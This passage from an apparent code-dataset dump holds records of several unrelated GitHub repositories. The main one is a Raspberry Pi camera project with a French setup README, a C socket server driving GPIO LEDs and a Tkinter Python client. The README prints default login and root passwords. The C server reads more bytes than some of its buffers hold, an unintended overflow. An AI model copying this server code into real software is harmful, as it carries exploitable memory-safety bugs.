data.tag in topic_info.tags:\n return data\n else:\n return None\n except Exception:\n return None\n\n # 发布数据函数\n def __fun(self):\n while True:\n # 取出数据\n data = self.__data_store.get_data()\n if data:\n for info in self.__driver_dict.values():\n # 查找驱动对应的主题配置\n topic_info = self.__topic_dict[info.topic]\n # 根据主题对数据进行过滤\n out_data = self.__get_data_by_topic(data, topic_info)\n if out_data:\n if len(self.__domain) > 0:\n data.tag = self.__domain + '.' + data.tag\n # 驱动发送数据\n info.driver.write_data(json.dumps({'topic': info.topic}), [out_data])\n # 离散数据读数为阻塞方式\n if DEBUG:\n time.sleep(2)\n" } ]
10
AliMohamadi93/toe
https://github.com/AliMohamadi93/toe
2c2c401fb6456143262ab0e9517f0cb3f22417c5
c2941424c8560a26e61188a6f107517c530ad635
b4105e1ce59e4f2edf8cb024b0a3c40d0fc62d74
refs/heads/master
2021-01-08T11:52:26.102802
2020-02-21T00:18:12
2020-02-21T00:18:12
242,017,987
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.58203125, "alphanum_fraction": 0.59375, "avg_line_length": 27.55555534362793, "blob_id": "d48b9dbb2aaf3b203c813ba07a952699c0210f7c", "content_id": "0ad2195ff6ec23eb484c330d93b5557054a5e4cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 49, "num_lines": 9, "path": "/etoo.py", "repo_name": "AliMohamadi93/toe", "src_encoding": "UTF-8", "text": "def getBert(variable):\n word_array = (variable.lower()).split(\"bert\")\n print(word_array)\n if len(word_array) > 2:\n i = \"\".join(word_array[1])\n return i[::-1]\n else:\n return \"\"\nprint(getBert(\"abcdebertfcbarcelonabertabcde\"))" } ]
1
Bulowl/Camera_2019
https://github.com/Bulowl/Camera_2019
212a1aa4f5d29d6d73a54a68fbe9a7e5bf01f446
75ed0b0f7ed7b3f5cb8f04f5c58ad4958b3c5d81
057d5f5d20121e215f7c44b26b4a67b3f0bb08db
refs/heads/master
2020-12-05T23:01:44.860217
2020-02-02T18:48:26
2020-02-02T18:48:26
232,270,190
0
0
null
2020-01-07T07:39:24
2020-01-30T08:13:57
2020-01-30T09:34:59
C
[ { "alpha_fraction": 0.7002725005149841, "alphanum_fraction": 0.7220708727836609, "avg_line_length": 14.25, "blob_id": "4cebb5a9e978cbbfb053e651dd384bf68e550b3b", "content_id": "db4d43126cd434db43a9765dca3f41f637f449fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 367, "license_type": "no_license", "max_line_length": 72, "num_lines": 24, "path": "/project/src/readme.txt", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "Philibert ADAM B00826597\n\nTo compile, either run:\nmake \n\nor\n\ngcc -g -o client gameClient.c\ngcc -g -o client gameServer.c\n\nTo run:\n\nfor server:\n./server 'Ip address' 'port number'\n\nfor client:\n./client 'port number'\n\n\nPort number needs to be the same.\nTo run on the same computer, type 'localhost' instead of the IP address.\n\nValable inputs: s, p or r\nQuit option: q\n\n" }, { "alpha_fraction": 0.6831773519515991, "alphanum_fraction": 0.7215247750282288, "avg_line_length": 25.877300262451172, "blob_id": "d77eef349d3a8a3331bf9cda5fbf83df06fec574", "content_id": "49406b824536bc2f2fe8fa303d07747150c8ae42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4402, "license_type": "no_license", "max_line_length": 330, "num_lines": 163, "path": "/README.md", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "# Camera_2019\n\n\n### Préparation RPi3.\n\nOn commence par récupérer le docker :\n\n````\n$ docker pull pblottiere/embsys-rpi3-buildroot\n$ docker run -it pblottiere/embsys-rpi3-buildroot-video /bin/bash\n# cd /root\n# tar zxvf buildroot-precompiled-2017.08.tar.gz\n````\n\nOn récupère ensuite le fichier sdcard.img :\n\n```` shell\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/output/images/sdcard.img .\n````\n\n et les fichiers start_x.elf et fixup_x.dat:\n\n```` shell\n$ docker cp 
<container_id>:/root/buildroot-precompiled-2017.08/output/build/rpi-firmware-685b3ceb0a6d6d6da7b028ee409850e83fb7ede7/boot/start_x.elf .\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/output/build/rpi-firmware-685b3ceb0a6d6d6da7b028ee409850e83fb7ede7/boot/fixup_x.dat .\n````\n\nOn flash la carte SD avec sdcard.img : \n\n```` shell\n$ sudo dd if=sdcard.img of=/dev/mmXXX\n````\n\navec mmXXX qui est l'emplacement de la carte SD (peut etre retrouvé grace à la commande dmesg)\n\nOn copie les fichier start_x.elf et fixup_x.dat sur la partition 1 de la carte SD (la plus petite) via du drag and drop ou le terminal.\n\nOn ajoute les deux lignes au fichier config.txt\n\nstart_x=1\ngpu_mem=128\n\nCes deux lignes vont permettre à notre rasp de boot avec start_x.elf et fixup_x.dat.\n\n\n\nIl nous faut ensuite connaitre l'adresse IP de notre rasp afin de pouvoir s'y connecter en SSH (beaucoup plus simple et pratique). En s'y connectant via un connecteur serie (tx -> rx, rx -> tx et gnd -> gnd) et avec un terminal serie (gtkterm pour nous avec port USB0 et 115200 baud) on peut se connecter en tant que user/user1* .\nOn se met ensuite en root (su -> root1* ) pour faire la commande ifconfig afin d'avoir notre adresse IP (172.20.21.162).\n\nEn se connectant sur le même réseau que la rasp on peut maitenant 'faire du ssh'.\n\n\n```` shell\n$ ssh [email protected]\n# [email protected]'s password: user1*\n ````\n \n### Cross-compilation\n #### Cross-compilation de v4l2grab\n On compile v4l2grab avec arm-linux-gcc sur le docker. 
On obtient un exécutable compatible avec la rpi3.\n \n Installation des librairies \n```` shell\n$ apt-get update\n$ apt-get install libjpeg-dev libv4l-dev autoconf automake libtool\n ````\n \n Clone du repository\n```` shell\n$ git clone https://github.com/twam/v4l2grab.git\n$ cd v4l2grab\n ````\n \n Création fichiers autotools\n```` shell\n$ ./autogen.sh\n ````\n \n Ajout du path vers le compilateur\n\n```` shell\n$ export PATH=$PATH:/root/buildroot-precompiled-2017.08/output/host/usr/bin\n ````\n Configuration\n```` shell\n$ ./configure --host=arm-linux\n ````\n Commenter malloc dans le fichier configure.ac\n\n#AC_FUNC_MALLOC\n\nMake\n```` shell\n$ make\n$ make install\n```` \n #### Cross-compilation de client et serveur\nDans le dossier src:\n ```` shell\n$ docker cp clientserver_docker/ <container_id>:/root/buildroot-precompiled-2017.08\n```` \nDans le docker <container_id>:\n ```` shell\n$ cd /root/buildroot-precompiled-2017.08/clientserver_docker\n$ make\n```` \nDans le dossier src:\n ```` shell\n$ docker cp <container_id>:/root/buildroot-precompiled-2017.08/clientserver_docker .\n```` \n\n### Branchement LEDs\nbranchement des leds:\n<p align=\"center\">\n <img src=\"https://github.com/pblottiere/embsys/blob/master/labs/rpi3/imgs/led_res.jpg\" width=\"350\" title=\"Github Logo\">\n</p>\n\ndéclarer les GPIO correspondant aux leds:\n```` shell\n$ cd /sys/class/gpio\n$ echo <gpio_pin> > export\n````\nOn peut tester les Pin grace à:\n```` shell\n$ cd gpio<gpio_pin>\n$ echo 1 > value\n````\n\n### Install Camera\n\nlien du [tuto](https://www.dexterindustries.com/howto/installing-the-raspberry-pi-camera/)\n\nOn doit faire cet commande sur la raspberry pi\n```` shell\n$ modprobe bcm2835-v4l2\n````\nVerifier qu'elle soit bien installée:\n```` shell\n$ ls /dev/video0\n/dev/video0\n````\n\n### Prendre un photo\nPour prendre une photo avec la camera il suffit de lancer la commande:\n````shell\n$./v4l2grab -h\n````\nIl ne reste plus qu'a choisir les différentes options 
que l'on veut mettre\n\n### Client Server\n\nLancer le server (depuis la raspberry pi):\n```` shell\n$ cd /home/user/clientserver_docker\n$ ./server <port> <pathToTheImageFolder>\n````\n\nLancer le client (depuis le pc):\n```` shell\n$ cd <pathToTheFolderclientserver_docker>\n$ ./client <server_IP> <port> <\"image_extension\">\n````\n<\"image_extension\"> est optionnel, si il n'est pas renseigné, le mode intéractif est lancé et on choisit alors le format des images que l'on veut récupérer.\n" }, { "alpha_fraction": 0.7461538314819336, "alphanum_fraction": 0.7461538314819336, "avg_line_length": 17.571428298950195, "blob_id": "fb33d4696ec6fe87c9f456dee951468242f47a50", "content_id": "8f381e127da1095886342f91402d83188b39aa09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 130, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/project/src/makefile", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "default: server client\n\nclient: gameClient.c \n\tgcc -g -o client gameClient.c\n\nserver: gameServer.c\n\tgcc -g -o server gameServer.c\n" }, { "alpha_fraction": 0.574391782283783, "alphanum_fraction": 0.594366192817688, "avg_line_length": 17.205127716064453, "blob_id": "94558d469c44d12e64e4d8794fc45da54399f0ae", "content_id": "2be76ce21c9ae9fbab4bf120f94bfc414cc1c4bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7810, "license_type": "no_license", "max_line_length": 82, "num_lines": 429, "path": "/project/src/new/server.c", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "/*\n Server finds images in directory.\n Creates entries into catalog.csv.\n Waits for clients.\n Responds to requests.\n*/\n\n\n/****Necessary includes****/\n#include \"md5sum.h\"\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <arpa/inet.h>\n#include <stdio.h>\n#include <unistd.h>\n#include 
<errno.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <dirent.h>\n#include <sys/sendfile.h>\n#include <fcntl.h>\n\n\n/*****Required global variables****/\nchar* logpath;\nchar* jpeg_array[200];\n\nint jpeg_count = 0;\n\nchar* file_array[200];\nchar* file_sizes[200];\nint file_count = 0;\n\n/**********Define for GPIO (led control*************/\n#define IN 0\n#define OUT 1\n\n#define LOW 0\n#define HIGH 1\n\n#define PINCONNECT 17 /* P1-18 */\n#define PINTRANSFER 18 /* P1-07 */\n\n/**********GPIO Function************/\n\nstatic int\nGPIOExport(int pin)\n{\n#define BUFFER_MAX 3\n\tchar buffer[BUFFER_MAX];\n\tssize_t bytes_written;\n\tint fd;\n\n\tfd = open(\"/sys/class/gpio/export\", O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open export for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tbytes_written = snprintf(buffer, BUFFER_MAX, \"%d\", pin);\n\twrite(fd, buffer, bytes_written);\n\tclose(fd);\n\treturn(0);\n}\n\nstatic int\nGPIOUnexport(int pin)\n{\n\tchar buffer[BUFFER_MAX];\n\tssize_t bytes_written;\n\tint fd;\n\n\tfd = open(\"/sys/class/gpio/unexport\", O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open unexport for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tbytes_written = snprintf(buffer, BUFFER_MAX, \"%d\", pin);\n\twrite(fd, buffer, bytes_written);\n\tclose(fd);\n\treturn(0);\n}\n\nstatic int\nGPIODirection(int pin, int dir)\n{\n\tstatic const char s_directions_str[] = \"in\\0out\";\n\n#define DIRECTION_MAX 35\n\tchar path[DIRECTION_MAX];\n\tint fd;\n\n\tsnprintf(path, DIRECTION_MAX, \"/sys/class/gpio/gpio%d/direction\", pin);\n\tfd = open(path, O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open gpio direction for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tif (-1 == write(fd, &s_directions_str[IN == dir ? 0 : 3], IN == dir ? 
2 : 3)) {\n\t\tfprintf(stderr, \"Failed to set direction!\\n\");\n\t\treturn(-1);\n\t}\n\n\tclose(fd);\n\treturn(0);\n}\n\nstatic int\nGPIORead(int pin)\n{\n#define VALUE_MAX 30\n\tchar path[VALUE_MAX];\n\tchar value_str[3];\n\tint fd;\n\n\tsnprintf(path, VALUE_MAX, \"/sys/class/gpio/gpio%d/value\", pin);\n\tfd = open(path, O_RDONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open gpio value for reading!\\n\");\n\t\treturn(-1);\n\t}\n\n\tif (-1 == read(fd, value_str, 3)) {\n\t\tfprintf(stderr, \"Failed to read value!\\n\");\n\t\treturn(-1);\n\t}\n\n\tclose(fd);\n\n\treturn(atoi(value_str));\n}\n\nstatic int\nGPIOWrite(int pin, int value)\n{\n\tstatic const char s_values_str[] = \"01\";\n\n\tchar path[VALUE_MAX];\n\tint fd;\n\n\tsnprintf(path, VALUE_MAX, \"/sys/class/gpio/gpio%d/value\", pin);\n\tfd = open(path, O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open gpio value for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tif (1 != write(fd, &s_values_str[LOW == value ? 0 : 1], 1)) {\n\t\tfprintf(stderr, \"Failed to write value!\\n\");\n\t\treturn(-1);\n\t}\n\n\tclose(fd);\n\treturn(0);\n}\n\n\n//Writes file size and file data to the socket\nvoid write_to_socket(char* file_name, int sockfd)\n{\n FILE* fp;\n \n if((fp = fopen(file_name,\"rb\")) == NULL)\n\t{\n printf(\"Error I guess? 
%s\\n\",strerror(errno));}\n //printf(\"Cannot open file\\n\");\n \n\t fseeko(fp,0,SEEK_END);\n\t int sz = ftello(fp);\n\t fseeko(fp,0,SEEK_SET);\n\t \n\t char sizeBuf[256];\n\t \n\t sprintf(sizeBuf,\"%d\",sz);\n\n\t write(sockfd,sizeBuf,256);\n\t int n;\n\t while(1)\n \t{\n\t \tunsigned char buf[256] = {0};\n\t int n = fread(buf,1,256,fp);\n\t\t \n\t\t if(n>0)\n\t\t\t\t{\n\t\t \t\t\twrite(sockfd,buf,n);\n\t\t\t\t}\n \n\t\t\tif(n<256)\n\t\t\t\t{\n\t \t\t\t\tif(feof(fp))\n\t\t\t\t printf(\"Finished sending: %s\\n\",file_name);\n\t\t\t\t \tbreak;\n\t\t\t\t}\n \t\t}\n \tfclose(fp);\n\n}\n \n//Writes file info to the catalog.\nvoid write_to_catalog(char* file_name, int file_size, unsigned char* sum)\n{\n int i;\n \n FILE* fp;\n fp = fopen(logpath,\"a\");\n fprintf(fp,\"%s\",file_name);\n fprintf(fp,\",\");\n fprintf(fp,\"%d\",file_size);\n fprintf(fp,\",\");\n for(i=0;i<MD5_DIGEST_LENGTH;i++)\n {\n fprintf(fp,\"%02x\",sum[i]);\n }\n fprintf(fp,\"%s\\n\",\" \");\n fclose(fp);\n}\n\nint is_jpeg(char* file_name)\n{\n if(strstr(file_name,\"jpeg\")) return 1;\n return 0;\n}\n\n//Adds files to the corresponding arrays.\nvoid addToArray(char* file_path)\n{\n if(is_jpeg(file_path))\n {\n jpeg_array[jpeg_count] = file_path;\n jpeg_count++;\n }\n //jpeg_count = 10;\n \n file_array[file_count] = file_path;\n file_count++;\n}\n\n//Recursively finds images in directories and sub-directories\nint find_images(char* in_dir,char* catpath)\n{\n DIR* indir;\n struct dirent* file;\n \n if((indir=opendir(in_dir)) == NULL)\n {\n perror(\"Unable to open target directory\\n\");\n exit(1);\n }\n \n while((file = readdir(indir))!=NULL)\n {\n if((file->d_name[0]) == '.') continue;\n \n if(file->d_type == DT_DIR)\n\t\t{\n\t\t \n\t\t char* path2 = malloc(200);\n\t\t strcpy(path2,in_dir);\n\t\t strcat(path2,\"/\");\n\t\t strcat(path2,file->d_name);\n\t\t find_images(path2,catpath);\n\t\t}\n \n if(is_jpeg(file->d_name))\n\t\t{\n\t\t char* file_path = malloc(200);\n\t\t 
strcpy(file_path,in_dir);\n\t\t strcat(file_path,\"/\");\n\t\t strcat(file_path,file->d_name);\n\t\t \n\t\t unsigned char sum[MD5_DIGEST_LENGTH];\n\t\t int i;\n\t\t addToArray(file_path);\n\t\t md5sum(file_path,sum);\n\t\t \n\t\t struct stat st = {0};\n\t\t \n\t\t stat(file_path,&st);\n\t\t \n\t\t write_to_catalog(file->d_name,(int)st.st_size,sum);\n\t\n\t\t}\n\t}\n return 0;}\n\n\nint main(int argc, char* argv[])\n{\n \n\tif(argc!=3)\n\t{\n\t\tperror(\"Incorrect number of arguments\\n\");\n\t\tperror(\"Usage: ./server <port_number> <directory>\\n\");\n\t\texit(1);\n\t}\n\n\t/*********** Define GPIO ***************/\n\t//Enable GPIO pins\n\tif (-1 == GPIOExport(PINCONNECT) || -1 == GPIOExport(PINTRANSFER))\n\t\treturn(1);\n\n\t//Set GPIO directions\n\tif (-1 == GPIODirection(PINCONNECT, OUT) || -1 == GPIODirection(PINCONNECT, OUT))\n\t\treturn(2);\n\n\t/**************************************/\n\n\tlogpath = malloc(200);\n\n\n\tstrcpy(logpath,argv[2]);\n\tstrcat(logpath,\"/\");\n\tstrcat(logpath,\"catalog.csv\");\n\n\n\tstruct stat st = {0};\n\n\tif(stat(logpath,&st) !=-1)\n\t{\n\t\tperror(\"Catalog file exists. 
Deleting it.\\n\");\n\t\tremove(logpath);\n\t\tFILE* fp;\n\t\tfp = fopen(logpath,\"a+\");\n\t\tperror(\"catalog.csv created\\n\");\n\t\tfclose(fp);\n\t}\n\n\telse\n\t{\n\t \n\t FILE* fp;\n\t fp = fopen(logpath,\"a+\");\n\t perror(\"catalog.csv created\\n\");\n\t fclose(fp);\n\t}\n\n\n\tFILE* fp;\n\tfp = fopen(logpath,\"a+\");\n\n\tfprintf(fp,\"File name,Size,Sum\\n\");\n\tfclose(fp);\n\tint i;\n\tint result;\n\n\tif((result=find_images(argv[2],logpath))!=0)\n\tprintf(\"Error finding images\\n\");\n\n\tint listenfd;\n\tint confd;\n\n\tstruct sockaddr_in serv_addr;\n\n\tchar sendBuff[1025];\n\tlistenfd = socket(AF_INET, SOCK_STREAM, 0);\n\n\tmemset(&serv_addr,'0',sizeof(serv_addr));\n\tmemset(sendBuff,'0',sizeof(sendBuff));\n\n\tserv_addr.sin_family = AF_INET;\n\tserv_addr.sin_addr.s_addr = htonl(INADDR_ANY);\n\tserv_addr.sin_port = htons(atoi(argv[1]));\n\n\tbind(listenfd,(struct sockaddr*)&serv_addr, sizeof(serv_addr));\n\n\tif(listen(listenfd,10) == -1)\n\t{\n\t\tperror(\"Could not listen\\n\");\n\t\treturn -1;\n\t}\n\n\twhile(1)\n\t{\n\n\t\tprintf(\"Listening for clients...\\n\");\n\n\t\tconfd = accept(listenfd, (struct sockaddr*)NULL, NULL);\n\n\t\tint n;\n\n\t\tchar buf[10];\n\n\t\tprintf(\"accepted a connection\\n\");\n\n\t\t//PINCONNECT ON\n\t\tif (-1 == GPIOWrite(PINCONNECT, 15))\n\t\t\treturn(3);\n \n\t\twrite_to_socket(logpath,confd);\n\n\t\tread(confd,buf,11);\n\n\n\t\tif(is_jpeg(buf))\n\t {\n\t\t\tprintf(\"Client in passive mode. 
Requesting %s files:\\n\",buf);\n\t \n\t\t\tif(is_jpeg(buf))\n\t\t\t{\n\n\n\t\t\t\tif (-1 == GPIOWrite(PINTRANSFER, 15))\n\t\t\t\t\treturn(4);\n\n\t\t\t\tfor(i=0;i<jpeg_count;i++){\n\n\t\t\t\t\tchar buffer[4];\n\t\t\t\t\tread(confd,buffer,5);\n\t\t\t\t \n\t\t\t\t \tif(strstr(buffer,\"ready\"))\n\t\t\t\t\t\t\twrite_to_socket(jpeg_array[i],confd);\n\n\t\t\t\t}\n\t\t\t}\n\t }\n\t \n \n //sleep(1);\n \n\t\treturn 0;\n\t}\n\n\tclose(confd);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5404740571975708, "alphanum_fraction": 0.5565742254257202, "avg_line_length": 33.94140625, "blob_id": "01a4da03321eb61ffb3234774da5a2cdfc917744", "content_id": "be143ae5bdfeb4039ea859bac7d69c2436f19a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8948, "license_type": "no_license", "max_line_length": 131, "num_lines": 256, "path": "/project/src/Client.py", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "import socket\nimport sys\nimport getopt\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter.messagebox import *\nimport matplotlib\nmatplotlib.use(\"Agg\")\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\n\n# Implement the default Matplotlib key bindings.\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nfrom matplotlib.pyplot import imshow,figure\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport signal\nimport syslog\nsyslog.openlog(\"Client_Camera\")\nprint(\"Message are logged in /var/log/syslog\")\n\n\nTAILLE_IMAGE = 40*480*3*8 #Taille du Buffer pour la recuperation\n\ngreen_on = 17 \ngreen_off = 170\nred_on = 18\nred_off = 180\n\n\n\n\nclass GUI(Tk):\n def __init__(self,IP=\"172.20.21.162\", port_serveur_led = 9000, port_serveur_camera = 7000):\n super().__init__()\n self.fig = Figure(figsize=(5, 4), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.canvas = FigureCanvasTkAgg(self.fig, 
master=self)\n self.data=[]\n self.quit_info = 0\n self.capture = 0 \n self.camera_connected = 0\n self.led_connected = 0\n self.receiving = 0\n\n self.Frame = Frame(self, borderwidth=2,relief = GROOVE)\n\n self.Frame.pack(side = TOP)\n\n self.b_quit = Button(master=self.Frame, text=\"Quit\", command=self._quit)\n self.b_quit.pack(side=BOTTOM)\n\n self.b_switch = Button(self.Frame,text=\"Capture\",command=self.switch)\n self.b_switch.pack(side=BOTTOM) \n \n blank = np.zeros((480,640))\n self.ax.imshow(blank,cmap = \"gray\")\n self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) \n\n self.cam = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_address_cam = (IP, port_serveur_camera)\n self.wait_cam_i = 0\n self.wait_cam()\n self.runtime()\n\n self.led = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_address_led = (IP, port_serveur_led)\n self.wait_led_i=0\n self.wait_led()\n\n def _quit(self):\n try:\n print(\"Quitting program\")\n except :\n pass\n self.cam.close()\n self.quit() \n self.destroy() \n \n def image(self):\n image = []\n number = 0\n \n for i in range(len(self.image_recupe)):\n if self.image_recupe[i]!=59:\n number = number *10 + int(self.image_recupe[i]-48)\n else:\n image.append(number)\n number = 0\n image = np.array(image[2:640*480+2]).reshape((480,640)) #recuperation de l image parmi les données envoyées\n self.ax.clear()\n self.ax.imshow(image,cmap='gray')\n self.canvas.draw()\n \n def wait_cam(self):\n if self.quit_info:\n self._quit()\n print(\"Try number \",self.wait_cam_i,\" for camera\")\n self.cam.settimeout(None)\n try:\n self.cam.settimeout(10)\n self.cam.connect(self.server_address_cam)\n print('connecting to {} port {}'.format(*self.server_address_cam))\n self.cam.send(b\"0\")\n syslog.syslog(syslog.LOG_INFO, 'connecting to {} port {}'.format(*self.server_address_cam))\n self.wait_cam_i = 0\n self.camera_connected = 1\n self.led_cam[\"background\"] = \"lawn green\"\n print(\"Connection 
Established with camera\")\n syslog.syslog(syslog.LOG_INFO, 'Connection Established with camera')\n except Exception as e:\n print(e)\n if self.camera_connected:\n self.led_cam[\"background\"] = \"red\"\n self.camera_connected = 0\n if self.wait_cam_i>10:\n print(\"Time Out\")\n syslog.syslog(syslog.LOG_ERR, \"Time Out\")\n #self._quit()\n else:\n self.wait_cam_i+=1\n self.after(10000,self.wait_cam)\n\n #Fonction pour attendre un connexion entre le camera et led\n def wait_led(self):\n if self.quit_info:\n self._quit()\n print(\"Try number \",self.wait_led_i,\" for led\")\n self.led.settimeout(20)\n try:\n self.led.settimeout(10)\n self.led.connect(self.server_address_led)\n print('connecting to {} port {}'.format(*self.server_address_led))\n syslog.syslog(syslog.LOG_INFO, 'connecting to {} port {}'.format(*self.server_address_led))\n self.wait_led_i = 0 \n self.led_connected = 1\n print(\"Connection Established with servomotor\")\n syslog.syslog(syslog.LOG_INFO, 'Connection Established with servomotor')\n except:\n if self.led_connected:\n self.led_connected = 0\n if self.wait_led_i>10:\n print(\"Time Out\")\n syslog.syslog(syslog.LOG_ERR, \"Time Out\")\n #self._quit()\n else:\n self.wait_led_i+=1\n self.after(10000,self.wait_led)\n \n\n def runtime(self):\n self.runtime_camera() #Fonction appelee toutes les 40ms pour l envoi et la reception de données avec la caméra\n \n def runtime_camera(self):\n if self.camera_connected:\n if not self.led_connected :\n self.wait_led()\n self.led.send(bytes([green_on]))\n try:\n if not self.capture or self.receiving:\n self.cam.send(b\"0\")\n else:\n self.cam.send(b\"1\")\n except :\n self.wait_cam()\n\n self.data = self.cam.recv(TAILLE_IMAGE)\n if self.data != b'empty' and not self.receiving:\n self.receiving = 1\n self.image_recupe = np.array([])\n self.led.send(bytes([red_off]))\n\n\n if self.data==b'empty':\n if self.receiving:\n self.image()\n self.led.send(bytes([red_on]))\n self.receiving = 0\n\n if self.receiving:\n 
temp = np.array([self.data[i] for i in range(len(self.data))])\n self.image_recupe = np.concatenate((self.image_recupe,temp))\n else:\n self.wait_cam()\n\n if self.quit_info:\n self.led.send(bytes([green_off]))\n self._quit()\n\n self.after(40,self.runtime_camera)\n\n def signal_handler(self,sig, frame):\n if (sig==signal.SIGINT or sig==signal.SIGTSTP or sig==sig.SIGTERM):\n self.quit_info = 1\n syslog.syslog(syslog.LOG_ERR, \"SIGINT signal received\")\n\n #Permet de lancer ou d arreter la capture\n def switch(self):\n if self.capture:\n self.capture = 0\n self.b_switch[\"text\"]=\"Capture\"\n else:\n self.capture = 1\n self.b_switch[\"text\"]=\"Stop\"\n\n\n\nif __name__ == \"__main__\":\n print(\"Launching \" + sys.argv[0])\n IP = \"172.20.21.162\"\n port_camera = 7000\n syslog.syslog(syslog.LOG_INFO, \"Launching \" + sys.argv[0] + \"\\n\")\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"h:i:s:c\", [\"help=\", \"ip=\", \"port_camera=\"])\n except getopt.GetoptError as err:\n print(err)\n print(\"\\n\")\n print(\"Wrong arguments or Not enough arguments\")\n print(\"Usage :\")\n print(\"Capture -i ip -c port_camera\")\n print(\" or \")\n print(\"Capture -ip ip -port_camera port_camera\")\n print(\"Quitting the program!\")\n syslog.syslog(syslog.LOG_ERR, \"Quitting the program!\\n\")\n sys.exit(2)\n print(opts)\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print(\"Options and arguments : \")\n print(\"-h or --help | Display this help message\")\n print(\"-i or --ip | Default is localhost. Ip Address of the RPi on which the server is running. \")\n print(\"-c or --port_camera | Default is 7000. 
Port of the RPi on which the server managing the camera is running\")\n print(\"\\n\")\n print(\"Usage :\")\n print(\"Capture -i ip -c port_camera\")\n print(\" or \")\n print(\"Capture -ip ip -port_camera port_camera\")\n print(\"Quitting the program!\")\n syslog.syslog(syslog.LOG_ERR, \"Quitting the program!\\n\")\n sys.exit()\n elif o in (\"-i\", \"--ip\"):\n IP = a\n elif o in (\"-c\", \"--port_camera\"):\n port_camera = int(a)\n else:\n assert False, \"unhandled option\"\n print(\"Quitting the program!\")\n syslog.syslog(syslog.LOG_ERR, \"Quitting the program!\\n\")\n sys.exit(1)\n\n interface = GUI(IP, port_camera)\n signal.signal(signal.SIGINT, interface.signal_handler)\n signal.signal(signal.SIGTSTP, interface.signal_handler)\n signal.signal(signal.SIGTERM, interface.signal_handler)\n interface.mainloop()" } ]
5
Hosseinberg/pyqentangle_Hosseinberg
https://github.com/Hosseinberg/pyqentangle_Hosseinberg
372db0e4c399d196314a7bbf9818760cd06b9f1a
fb4e48c314ccec3c3740a5db422434e916b2038c
ed6e414b70182a110296552faf44336383f7851a
refs/heads/master
2020-04-28T08:31:08.316091
2019-03-20T06:35:05
2019-03-20T06:35:05
175,130,563
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7379899621009827, "alphanum_fraction": 0.7432950139045715, "avg_line_length": 47.4571418762207, "blob_id": "a9e3781e84086898ec2f76f7edaaf33b428a9f61", "content_id": "be50cd3697930d36b7b96d32d28a7ad2edfffc6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3393, "license_type": "permissive", "max_line_length": 140, "num_lines": 70, "path": "/pyqentangle/schmidt.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nfrom .bipartite_reddenmat_nocheck import bipartitepurestate_reduceddensitymatrix_nocheck\nfrom .bipartite_denmat import bipartitepurestate_densitymatrix_cython\n\n\n# total density matrix\ndef bipartitepurestate_densitymatrix(bipartitepurestate_tensor):\n \"\"\"Calculate the whole density matrix of the bipartitite system\n\n Given a discrete normalized quantum system, given in terms of 2-D numpy array ``bipartitepurestate_tensor``,\n each element of ``bipartitepurestate_tensor[i, j]`` is the coefficient of the ket :math:`|ij\\\\rangle`,\n calculate the whole density matrix.\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :return: density matrix\n :type bipartitepurestate_tensor: numpy.ndarray\n :rtype: numpy.ndarray\n\n \"\"\"\n return bipartitepurestate_densitymatrix_cython(bipartitepurestate_tensor)\n\n\ndef bipartitepurestate_reduceddensitymatrix(bipartitepurestate_tensor, kept):\n \"\"\"Calculate the reduced density matrix for the specified subsystem\n\n Given a discrete normalized quantum system, given in terms of 2-D numpy array ``bipartitepurestate_tensor``,\n each element of ``bipartitepurestate_tensor[i, j]`` is the coefficient of the ket :math:`|ij\\\\rangle`,\n calculate the reduced density matrix of the specified subsystem.\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, 
